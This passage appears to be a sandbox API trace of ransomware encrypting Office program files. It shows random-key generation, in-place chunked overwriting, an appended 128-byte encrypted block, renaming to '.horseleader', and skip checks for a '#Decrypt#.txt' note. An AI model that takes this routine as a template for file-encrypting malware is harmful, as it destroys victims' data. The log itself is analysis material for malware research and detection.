lstrcmpiW (lpString1="Office.en-us", lpString2="Windows") returned -1 [0244.464] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us") returned 96 [0244.464] lstrcmpW (lpString1="Office.en-us", lpString2=".") returned 1 [0244.464] lstrcmpW (lpString1="Office.en-us", lpString2="..") returned 1 [0244.464] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.464] GetProcessHeap () returned 0x780000 [0244.464] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.464] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*") returned 98 [0244.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.468] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.468] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\.") returned 98 [0244.468] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.468] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", cAlternateFileName="")) returned 1 [0244.468] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.468] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\..") returned 99 [0244.468] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.468] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.468] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9fff00, ftCreationTime.dwHighDateTime=0x1cba028, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e9fff00, ftLastWriteTime.dwHighDateTime=0x1cba028, nFileSizeHigh=0x0, nFileSizeLow=0x3b78, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="BRANDING.DLL", cAlternateFileName="")) returned 1 [0244.468] lstrcmpiW (lpString1="BRANDING.DLL", lpString2="Windows") returned -1 [0244.468] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 109 [0244.468] StrStrIW (lpFirst="BRANDING.DLL", lpSrch=".horseleader") returned 0x0 [0244.468] lstrcmpW (lpString1="BRANDING.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.468] lstrcmpW (lpString1="BRANDING.DLL", lpString2="_uninstalling_.png") returned 1 [0244.468] lstrlenW (lpString=".testttjffg") returned 11 [0244.469] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL", lpSrch=".testttjffg") returned 0x0 [0244.469] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.469] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 109 [0244.471] StrStrW (lpFirst="BRANDING.DLL", lpSrch=".txt") returned 0x0 [0244.471] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=15224) returned 1 [0244.471] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x3b78, lpOverlapped=0x0) returned 1 [0244.473] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffc488, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.473] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x3b78, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x3b78, lpOverlapped=0x0) returned 1 [0244.474] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.474] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.474] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.474] CloseHandle (hObject=0x15c) returned 1 [0244.474] GetProcessHeap () returned 0x780000 [0244.474] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.474] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL.horseleader") returned 121 [0244.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll.horseleader")) returned 1 [0244.479] GetProcessHeap () returned 0x780000 [0244.479] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.479] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x470e1800, ftCreationTime.dwHighDateTime=0x1caccea, ftLastAccessTime.dwLowDateTime=0x15334ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x470e1800, ftLastWriteTime.dwHighDateTime=0x1caccea, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="BRANDING.XML", cAlternateFileName="")) returned 1 [0244.479] lstrcmpiW (lpString1="BRANDING.XML", lpString2="Windows") returned -1 [0244.479] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 109 [0244.479] StrStrIW (lpFirst="BRANDING.XML", lpSrch=".horseleader") returned 0x0 [0244.479] lstrcmpW (lpString1="BRANDING.XML", lpString2="#Decrypt#.txt") returned 1 [0244.479] lstrcmpW (lpString1="BRANDING.XML", lpString2="_uninstalling_.png") returned 1 [0244.479] lstrlenW (lpString=".testttjffg") returned 11 [0244.479] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML", lpSrch=".testttjffg") returned 0x0 [0244.479] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.479] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 109 [0244.481] StrStrW (lpFirst="BRANDING.XML", lpSrch=".txt") returned 0x0 [0244.481] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=596341) returned 1 [0244.481] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.481] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.484] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.484] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.486] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x464ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.486] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.488] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.488] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.489] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x8c975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.489] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.491] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.492] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.492] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.492] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.492] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.492] CloseHandle (hObject=0x15c) returned 1 [0244.492] GetProcessHeap () returned 0x780000 [0244.492] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.492] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.horseleader") returned 121 [0244.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.horseleader")) returned 1 [0244.493] GetProcessHeap () returned 0x780000 [0244.493] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.493] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4114ea00, ftCreationTime.dwHighDateTime=0x1ca6af2, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x4114ea00, ftLastWriteTime.dwHighDateTime=0x1ca6af2, nFileSizeHigh=0x0, nFileSizeLow=0x11644, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OCT.CHM", cAlternateFileName="")) returned 1 [0244.493] lstrcmpiW (lpString1="OCT.CHM", lpString2="Windows") returned -1 [0244.493] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 104 [0244.493] StrStrIW (lpFirst="OCT.CHM", lpSrch=".horseleader") returned 0x0 [0244.493] lstrcmpW (lpString1="OCT.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.493] lstrcmpW (lpString1="OCT.CHM", lpString2="_uninstalling_.png") returned 1 [0244.493] lstrlenW (lpString=".testttjffg") returned 11 [0244.493] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM", lpSrch=".testttjffg") returned 0x0 [0244.494] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.494] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.495] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 104 [0244.495] StrStrW (lpFirst="OCT.CHM", lpSrch=".txt") returned 0x0 [0244.495] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=71236) returned 1 [0244.495] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.495] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.498] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.498] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.498] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x6322, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.498] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.499] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.499] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.499] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xc644, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.500] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.500] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.500] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.500] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.500] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.500] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.501] CloseHandle (hObject=0x15c) returned 1 [0244.501] GetProcessHeap () returned 0x780000 [0244.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.501] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.horseleader") returned 116 [0244.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.horseleader")) returned 1 [0244.501] GetProcessHeap () returned 0x780000 [0244.502] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.502] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7c27050, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OfficeMUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0244.502] lstrcmpiW (lpString1="OfficeMUI.XML", lpString2="Windows") returned -1 [0244.502] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 110 [0244.502] StrStrIW (lpFirst="OfficeMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.502] lstrcmpW (lpString1="OfficeMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.502] lstrcmpW (lpString1="OfficeMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.502] lstrlenW (lpString=".testttjffg") returned 11 [0244.502] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 110 [0244.503] StrStrW (lpFirst="OfficeMUI.XML", lpSrch=".txt") returned 0x0 [0244.503] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=5557) returned 1 [0244.503] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x15b5, lpOverlapped=0x0) returned 1 [0244.505] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffea4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.505] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x15b5, lpOverlapped=0x0) returned 1 [0244.505] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.505] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.505] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.505] CloseHandle (hObject=0x15c) returned 1 [0244.505] GetProcessHeap () returned 0x780000 [0244.505] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.505] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.horseleader") returned 122 [0244.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.horseleader" (normalized: "c:\\program files\\common 